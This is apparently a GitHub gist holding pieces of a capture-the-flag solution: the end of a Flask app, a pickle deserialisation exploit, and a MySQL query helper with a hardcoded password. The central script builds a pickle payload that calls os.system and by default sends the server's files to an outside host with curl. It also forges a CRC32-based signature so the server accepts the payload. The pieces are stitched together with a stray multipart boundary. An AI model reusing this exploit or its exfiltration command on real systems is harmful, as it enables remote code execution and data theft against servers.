return redirect(url_for('register'))
@app.route('/static/<path:p>')
def wtf(p):
return send_from_directory("static", p)
if __name__ == '__main__':
app.run()
from webapp import app
--------------------------c8644242a31a3d0f--import binascii, base64
import pickle
import os, sys, subprocess
import hashlib, hmac
from zlib import crc32
DEFAULT_COMMAND = "cat * > /tmp/out; curl p6.is:4444 -F a=@/tmp/out"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND
class PickleRce(object):
def __reduce__(self):
return (os.system,(COMMAND,))
data = pickle.dumps(PickleRce())
hmac = lambda s: crc32(b"\xDC\x0B\x53\xD3" + s)
res = hmac(data)
print('{}-{}'.format(data.hex(), hex(res)[2:]))import mysql.connector
def connect_to_db():
conn = mysql.connector.connect(host="db", user='dbuser', password='123456', database='users')
cursor = conn.cursor()
return conn, cursor
def do_query(stmt, args, insert=False):
conn, cur = connect_to_db()
cur.execute(stmt, args)
if insert:
conn.commit()
res = None
else:
res = cur.fetchall()
cur.close()
conn.close()
return res
connect_to_db()
print(repr(do_query("SELECT content FROM notes limit 3", ())))
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Thanks 🚀 🥳